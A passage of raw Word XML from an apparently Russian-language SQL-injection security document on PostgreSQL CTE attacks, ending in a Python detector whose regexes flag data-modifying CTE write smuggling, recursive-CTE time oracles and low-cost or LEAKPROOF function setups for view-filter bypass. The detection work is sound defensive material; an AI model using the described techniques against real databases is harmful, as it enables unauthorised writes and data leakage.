        <w:t xml:space="preserve"> — 3.4 предполагает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, 3.10.2 — альтернативы. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен — 3.4; если в WAF blacklist — 3.10.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B64F56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.17 (RLS bypass) vs 3.10.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — близкие концепции, разные механизмы. RLS — отдельная фича PG (CREATE POLICY), её bypass через CVE (R9, R11) разбирается в 3.17. View ACL — другой механизм (WHERE-фильтр внутри view); 3.10.3 — bypass через push-down и materialization control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0E74BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8 (Metadata) — потребитель 3.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>: blind-разведка метаданных через CTE-time-oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A0F649" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>rules.py — готовое правило для класса CTE_SIDE_EFFECTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E152BE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сводный regex по всем трём подразделам 3.10. Структура такая же, как для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OOB_EXFILTRATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в summary-3.6 и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FILTER_BYPASS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в summary-3.9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D413D04"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5ACE99F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class VulnerabilityClass(str, Enum):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F59EED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DED026" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    CTE_SIDE_EFFECTS = "cte_side_effects"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E42AC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A007D"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2B01A057" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VulnerabilityClass.CTE_SIDE_EFFECTS: 8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870F6C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B833F2"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55AD83EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"cte_dml": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAB4A6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.1 — DML внутри WITH с RETURNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5253394C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bWITH\b[\s\S]{0,200}?\bAS\b\s*(?:NOT\s+)?(?:MATERIALIZED\s+)?\(\s*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCA02A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:INSERT|UPDATE|DELETE|MERGE)\b[\s\S]{0,500}?\bRETURNING\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D3DB84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99288D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B57BA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"cte_recursive_large_n": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A553B49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.2 — recursive CTE c итерацией ≥ 10^6 (calibrated time-oracle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D05157" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bWITH\s+RECURSIVE\b[\s\S]{0,300}?\bWHERE\s+\w+\s*&lt;\s*\d{6,}|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD26B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.2 — generate_series с N ≥ 10^7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552DF1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bgenerate_series\s*\(\s*\d+\s*,\s*\d{7,}\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17467B49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F45CE4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C413E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"cte_leaky_setup": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277F93A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.3 setup — функция с экстремально низкой cost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64506D58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b[\s\S]{0,500}?\bCOST\s+0\.\d{4,}|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FB696" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.3 setup — функция с LEAKPROOF (требует SUPERUSER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8C8EBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b[\s\S]{0,500}?\bLEAKPROOF\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C67B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473296EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD46FE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"cte_not_materialized": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D55259" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.10.3 explicit anti-protection — атакующий блокирует попытку CTE-материализации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4F5FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"\bWITH\b[\s\S]{0,100}?\bAS\s+NOT\s+MATERIALIZED\b",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D42E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C4B8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030AF32F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562003D3"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253FA6E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["cte_dml"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1951A"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6FF1C2FC"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vulnerability_class=VulnerabilityClass.CTE_SIDE_EFFECTS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D234C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233ED005" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Запрос содержит data-modifying CTE (WITH ... AS "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBF059E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "(INSERT|UPDATE|DELETE|MERGE ... RETURNING)) — паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4741E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "smuggling-а write-операций через SELECT-эндпоинт. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB85460" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "Не блокируется extended-protocol stacking-защитой.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C899A59" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Если эндпоинт логически только читает — заблокируйте "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3405E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "WITH ... AS (DML ...) на уровне SQL-validation или "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF92F89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "перейдите на read-only-роль для соответствующего "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A18F5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "connection-pool.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7205882C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5945F253" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E3B2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
